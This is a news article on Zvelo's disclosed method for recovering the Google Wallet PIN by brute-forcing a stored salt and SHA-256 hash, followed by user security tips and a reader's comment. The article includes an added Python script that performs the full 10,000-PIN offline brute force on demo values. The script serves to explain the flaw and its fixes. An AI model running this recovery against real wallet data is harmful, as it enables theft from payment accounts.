Web security provider Zvelo has uncovered a way to crack the Google Wallet PIN security feature.
Using an app called “Wallet Cracker,” Zvelo was able to expose the PIN of a Google Wallet account without entering a single invalid attempt – five invalid attempts and the wallet locks out.
Check out the video for a demonstration:
So how did they do it?
“Within the PIN information section was a long integer ‘salt’ and a SHA256 hex encoded string ‘hash,’” Zvelo said in a release. “Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes. This is trivial even on a platform as limited as a smart phone. Proving this hypothesis took little time.”
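The arithmetic in Zvelo's statement, as an added example (not Zvelo's or Google's code): with only a salt and a fast SHA-256 hash on the device, the five-attempt lockout never fires because the guessing happens offline, and the search space is exactly 10,000 candidates. The salt-then-PIN concatenation order and all demo values are assumptions constructed for this example; the article does not state the exact format.

```python
import hashlib
import hmac
import time
from typing import Optional, Tuple

PIN_SPACE = 10_000  # every 4-digit numeric PIN, 0000 through 9999

def pin_hash(salt: int, pin: str) -> str:
    """SHA-256 hex digest over the decimal salt followed by the PIN.

    Assumption: the article gives only 'a long integer salt' and a
    'SHA256 hex encoded string hash'; the salt-then-PIN order is ours.
    """
    return hashlib.sha256(f"{salt}{pin}".encode()).hexdigest()

def recover_pin(salt: int, target_hash: str) -> Tuple[Optional[str], int]:
    """Sweep the whole 4-digit space against a stored salt and hash.

    Returns (pin, hashes_computed). The wallet's five-attempt lockout is
    irrelevant here: the verifier is the attacker's own CPU, not the app.
    """
    for n in range(PIN_SPACE):
        pin = f"{n:04d}"
        if hmac.compare_digest(pin_hash(salt, pin), target_hash):
            return pin, n + 1
    return None, PIN_SPACE

def full_sweep_seconds(iterations: int, sample: int = 10) -> float:
    """Estimate a 10,000-PIN sweep if each guess cost a PBKDF2 run.

    Shows why a slow KDF alone is not a fix: it multiplies the cost by a
    constant, but the candidate count stays at 10,000. Only moving the
    check off the device (a secure element or a rate-limited server)
    restores the lockout.
    """
    start = time.perf_counter()
    for n in range(sample):
        hashlib.pbkdf2_hmac("sha256", f"{n:04d}".encode(), b"salt", iterations)
    return (time.perf_counter() - start) / sample * PIN_SPACE

# Constructed demo values; not taken from any real wallet.
DEMO_SALT = 1234567890123456789
DEMO_PIN = "7305"
DEMO_HASH = pin_hash(DEMO_SALT, DEMO_PIN)

if __name__ == "__main__":
    pin, guesses = recover_pin(DEMO_SALT, DEMO_HASH)
    print(f"recovered {pin} after {guesses} hashes (worst case {PIN_SPACE})")
    print(f"PBKDF2 x100000 per guess: ~{full_sweep_seconds(100_000):.0f}s sweep")
```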
Zvelo says it has shared the discovery with Google, who confirmed the issue and agreed to “work quickly to resolve it.” In the meantime, Zvelo offers the following recommendations for Wallet users:
Do Not “Root” the Cell Phone – Doing so will be one less step for a thief.
Enable Lock Screens – Face Unlock, Pattern, PIN and Password all increase physical security to the device. Slide, however, does not.
Disable USB Debugging – When enabled, the data on mobile devices can be accessed without first passing a lock screen challenge unless Full Disk Encryption is also enabled.
Enable Full Disk Encryption – This will prevent even USB Debugging from bypassing the lock screen.
Maintain Device Up-To-Date – Ensure the device is current with the latest official software. Unfortunately, users are largely at the behest of their carrier and cell phone manufacturer for this. Using only official software and keeping devices up-to-date is the best way to minimize vulnerabilities and increase security overall.

The PIN is stored in the app ??? Google is not aware there is a secure element in the phone ???
I just can't believe it!
I love the concept behind Google Wallet (http://www.google.com/wallet), because I believe that digital wallets, just like their physical equivalents, should allow their users to store in them all of the payment instruments they may want, including credit and debit cards issued by different banks and displaying different brand logos. And Google is doing precisely that. However, data security is much more important than either user-friendliness or convenience. In fact, your service should not be offered to consumers until you can guarantee that your system can protect their personal information. And that is clearly not the case with Google. Moreover, hacking Google Wallet is reported to be a "trivial" exercise, which makes me wonder whether Google even cares all that much about protecting its customers' information. I can only hope they will prove that they do. http://blog.unibulmerchantservices.com/app-cracks-your-google-wallet-pin-in-seconds